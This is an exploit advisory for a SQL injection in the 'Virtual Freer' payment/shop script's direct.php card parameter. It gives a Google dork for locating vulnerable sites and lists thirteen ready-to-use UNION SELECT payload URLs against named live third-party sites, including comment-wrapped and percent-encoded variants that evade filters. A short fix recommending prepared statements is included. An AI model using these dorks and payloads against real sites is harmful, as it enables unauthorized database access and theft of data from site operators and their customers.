############In The Name Of God############
# Exploit Title : Virtual Freer SQL injection Vulnerability
# Exploit Author : R4SOUL
# Vendor Homepage : http://freer.ir/
# Google Dork : site:.ir inurl:direct.php?card=
# Date : 26 January 2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
###########################################
# PoC: http://behtarinservice.cf/shop/direct.php?card=[SQLI]&qty=1
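#
# Affected parameter : card (GET) in direct.php. Every demo below closes a double-quoted value with %22 before the UNION, which suggests the parameter is placed inside a quoted string in the SQL query without escaping or parameter binding.
# Fix : pass card to the query as a bound parameter of a prepared statement; if card IDs are always numeric, also reject any value that is not a plain integer. Keyword filtering is not a sufficient fix: the demos include comment-wrapped and percent-encoded spellings of the same keywords.
#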
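# Demos (each selects version() in the second column; the UNION has 12, 13 or 14 columns depending on the site) :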
# http://behtarinservice.cf/shop/direct.php?card=-2%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--%20-&qty=1
# http://inet2.ir/direct.php?card=-9%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--%20-&qty=1
# http://lebes.ir/pay/direct.php?qty=1&card=3%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12-- -
# http://www.milanvpn50.tk/boy/direct.php?qty=1&card=-16%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--%20-
# http://www.nextvpn.in/pay/direct.php?card=-2%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--%20-&qty=1
# http://www.nikaserver.ir/direct.php?card=-38%22+/*!50000union*/+select+1,version(),3,4,5,6,7,8,9,10,11,12--%20-&qty=1
# http://pay.freer.ir/direct.php?card=-5%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--%20-&qty=1
# http://viberbazar.ir/payment/direct.php?card=-1%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--%20-&qty=1
# http://shop.digiping.ir/direct.php?card=-91%22+un%69on+s%65lect+1,version%28%29,3,4,5,6,7,8,9,10,11,12-- -&qty=1
# http://www.sabzandishan.ir/shop/direct.php?card=-64%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13--%20-&qty=1
# http://shop.mihannod.ir/direct.php?card=-15%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--%20-&qty=1
# http://www.nextvpn.in/pay/direct.php?card=-2%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--%20-&qty=1
# http://store.parseset.ir/direct.php?card=-3%22+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14--%20-&qty=1
###########################################